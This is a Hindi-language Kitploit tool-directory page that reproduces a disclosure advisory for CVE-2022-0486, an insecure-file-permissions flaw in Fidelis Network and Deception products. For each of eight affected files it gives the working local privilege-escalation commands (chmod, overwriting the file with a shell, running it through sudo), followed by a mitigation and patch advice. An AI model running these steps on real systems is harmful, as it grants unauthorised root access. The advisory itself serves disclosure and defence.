Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - असुरक्षित फ़ाइल अनुमतियाँ विशेषाधिकार वृद्धि - एकाधिक | Kitploit
उपकरण/GitHubGitHub/henryreed/cve-2022-0486
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - असुरक्षित फ़ाइल अनुमतियाँ विशेषाधिकार वृद्धि - एकाधिक

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Fidelis Network and Deception - CVE-2022-0486 - असुरक्षित फ़ाइल अनुमतियाँ विशेषाधिकार उन्नयन - एकाधिक

रिलीज़ेबिलिटी और स्वीकृतियाँ

सभी एक्सप्लॉइट्स को अमेरिकी सरकार द्वारा सार्वजनिक रिलीज़ के लिए अनुमोदित किया गया था। अनंत वितरण के लिए दस्तावेज़ीकरण को मंजूरी देने वाले सेवाकर्मियों और सरकारी संपर्कों का विशेष धन्यवाद। कृपया निम्नलिखित OTR नंबर देखें:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

मेटाडेटा

दिनांक: 20220517 2005H UTC

एक्सप्लॉइट लेखक: Henry Reed, The Aerospace Corporation

विक्रेता होमपेज: https://fidelissecurity.com/

प्रभावित संस्करण:

  • Fidelis CommandPost 9.4.5 से पहले
  • Fidelis Collector 9.4.5 से पहले
  • Fidelis Sensor 9.4.5 से पहले
  • Fidelis Sandbox 9.4.5 से पहले

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

CVE: CVE-2022-0486

CVE विवरण: Fidelis Network और Deception के CommandPost, Collector, Sensor, और Sandbox घटकों में अनुचित फ़ाइल अनुमतियाँ एक आक्रमणकारी को CLI तक स्थानीय, प्रशासनिक पहुँच रखने वाले को प्रभावित फ़ाइलों को संशोधित करने और रूट उपयोगकर्ता के समकक्ष विशेषाधिकारों को सक्षम करने की अनुमति देती हैं। यह भेद्यता Fidelis Network और Deception संस्करण 9.4.5 से पहले के संस्करणों में मौजूद है। इस भेद्यता को दूर करने के लिए पैच और अपडेट उपलब्ध हैं।

संक्षेप में मुख्य बात

इस CVE के अंतर्गत कई एक्सप्लॉइट मौजूद हैं, क्योंकि CVE अनुचित फ़ाइल अनुमतियों की एक श्रृंखला को कवर करता है। सभी एक्सप्लॉइट fidelis उपयोगकर्ता को उन बाइनरी या स्क्रिप्ट्स पर एक NOPASSWD और कई पासवर्ड-आवश्यक sudoers अनुमतियाँ दिए जाने के कारण हैं, जिनका स्वामी fidelis उपयोगकर्ता स्वयं है, इसलिए fidelis उपयोगकर्ता को फ़ाइल को मनमाने ढंग से संशोधित करने की अनुमति मिलती है। यह स्थानीय विशेषाधिकार उन्नयन की अनुमति देता है।

NOPASSWD के साथ प्रभावित फ़ाइल:

  • /FSS/bin/shutdown.pl

पासवर्ड की आवश्यकता वाली प्रभावित फ़ाइलें:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

प्रभावित Fidelis Deception या Fidelis Network उपयोगकर्ताओं को इस भेद्यता को पैच करने के लिए अपने सॉफ़्टवेयर को अपडेट करने की अनुशंसा की जाती है। सभी उपयोगकर्ताओं के लिए, चाहे वे इस भेद्यता से प्रभावित हुए हों या नहीं, प्रारंभिक कॉन्फ़िगरेशन के बाद अपने Fidelis उत्पादों तक शेल पहुँच को अक्षम करने की भी अनुशंसा की जाती है।

यदि, किसी कारण से, इनमें से कोई भी संभव नहीं है, तो इस दस्तावेज़ में प्रत्येक कमजोर फ़ाइल के लिए एक शमन वर्णित है। लेखक के परीक्षण की सीमा तक, ऐसा प्रतीत होता है कि वर्णित शमनों को लागू करने से पहले उपयोगकर्ताओं को विशेषाधिकार बढ़ाने के लिए इनमें से किसी एक भेद्यता का उपयोग करना होगा, इसलिए Fidelis को अपडेट करना और SSH को अक्षम करना दृढ़ता से अनुशंसित है।

Shutdown.pl विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/bin/shutdown.pl पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड के लिए संकेत दिए बिना रूट उपयोगकर्ता के रूप में /FSS/bin/shutdown.pl निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. shutdown.pl फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट। NOPASSWD लाइन पर ध्यान दें, जो इंगित करती है कि shutdown.pl विशेषाधिकार उन्नयन के लिए एक संभावित उम्मीदवार है:

शमन:

/FSS/bin/shutdown.pl के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/shutdown.pl के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

cert_mgmt प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/setup/cert_mgmt पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/setup/cert_mgmt निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. cert_mgmt फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/setup/cert_mgmt के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/setup/cert_mgmt के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

db_updater प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3

सारांश:

/FSS/bin/db_updater पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को Fidelis CommandPost में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/db_updater निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. db_updater फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/bin/db_updater

शमन:

/FSS/bin/db_updater के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/db_updater के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

deception-manager प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3

सारांश:

/FSS/deception-manager/bin/deception-manager पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को Fidelis CommandPost में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/deception-manager/bin/deception-manager निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/deception-manager/bin/deception-manager के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/deception-manager/bin/deception-manager के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

fssdbg.sh प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/sbin/fssdbg.sh पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/sbin/fssdbg.sh निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. fssdbg.sh फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/sbin/fssdbg.sh के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/sbin/fssdbg.sh के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

mst प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/bin/mst पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/mst निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. mst फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/bin/mst

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/bin/mst के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/mst के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा। निम्नलिखित विशेषाधिकार उन्नयन शमन और sudo के बिना fidelis द्वारा चलाए जाने पर mst कमांड आउटपुट का एक अंश दर्शाने वाला स्क्रीनशॉट है:

स्क्रीनशॉट दिखाता है कि शमन के साथ भी, कमांड को fidelis उपयोगकर्ता द्वारा sudo के रूप में चलाया जा सकता है:

स्क्रीनशॉट दिखाता है कि शमन का उपयोग करने पर mst को अन्य मनमाना कोड चलाने के लिए संशोधित नहीं किया जा सकता है:

setup प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/bin/setup पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/setup निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. setup फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/bin/setup

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/bin/setup के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/setup के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

unlock_cp_user.sh प्रमाणित विशेषाधिकार उन्नयन

परीक्षण किया गया:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (आंतरिक VM) Sensor 9.4.3

सारांश:

/FSS/setup/unlock_cp_user.sh पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/setup/unlock_cp_user.sh निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

एक्सप्लॉइट:

  1. unlock_cp_user.sh फ़ाइल के संशोधन की अनुमति देने के लिए अनुमतियाँ बदलें:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. फ़ाइल को आवश्यकतानुसार बदलें ताकि मनमाना कोड निष्पादित हो या, इस उदाहरण में, एक शेल प्राप्त हो:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. sudo कमांड का उपयोग करके फ़ाइल लॉन्च करें और fidelis उपयोगकर्ता पासवर्ड से प्रमाणित करें:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

शमन:

/FSS/setup/unlock_cp_user.sh के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/setup/unlock_cp_user.sh के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

टूल डाउनलोड करें